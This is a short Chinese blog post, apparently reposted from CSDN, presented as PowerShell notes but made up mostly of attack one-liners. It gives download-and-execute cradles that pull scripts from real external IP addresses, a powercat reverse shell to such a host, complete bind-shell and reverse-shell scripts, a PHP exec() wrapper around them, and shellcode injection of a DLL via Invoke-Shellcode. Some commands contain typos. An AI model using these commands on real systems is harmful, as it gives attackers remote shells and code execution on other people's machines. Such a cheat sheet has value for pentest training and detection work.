开发知识点-Powershell

发布时间:2023年12月25日

在这里插入图片描述

开发知识点-Powershell

自win7/win 2008开始

win系统增加了powershell工具。  
PowerShell是一种命令行外壳程序和脚本环境


文件路径:
where powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

支持系统: win7/win2008 =<
powershell (new-objectNet.WebClient).DownloadFile('http://url/aa.ps1','c:\bb.ps1')


PowerShell:一个强大的命令行工具,可用于下载文件落地和管理网络连接。

powershell -Command "& 'path\to\program.exe'"

PowerShell \ ConvertTo-Shellcode.ps1:将 DLL 转换为 shellcode





使用 powershell 转换 DLL 并使用 Invoke-Shellcode 加载

Import-Module .\Invoke-Shellcode.ps1
Import-Module .\ConvertTo-Shellcode.ps1
Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)

监听

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

文件下载

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"


powershell IEX (New-Object System.Net.Webclient).DownloadString('http://101.43.159.27/powercat.ps1')

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://101.43.159.27/powercat.ps1');powercat -c 101.43.159.27 -p 1474 -e cmd

 exec("powershell IEX (New-Object System.Net.Webclient).DownloadString('http://101.43.159.27/powercat.ps1');powercat -c 101.43.159.27 -p 1474 -e cmd");



iex(new-object system.net.webclient).downloadstrin('http://101.43.159.27/cslow.ps1')
- powershell iex(new-object system.net.webclient).downloadstrin('http://101.43.159.27/cslow.ps1')


反弹

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://101.43.159.27/cs32low.ps1')"
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('120.48.83.89',12369);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
文章来源:https://blog.csdn.net/qq_33608000/article/details/135202678
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。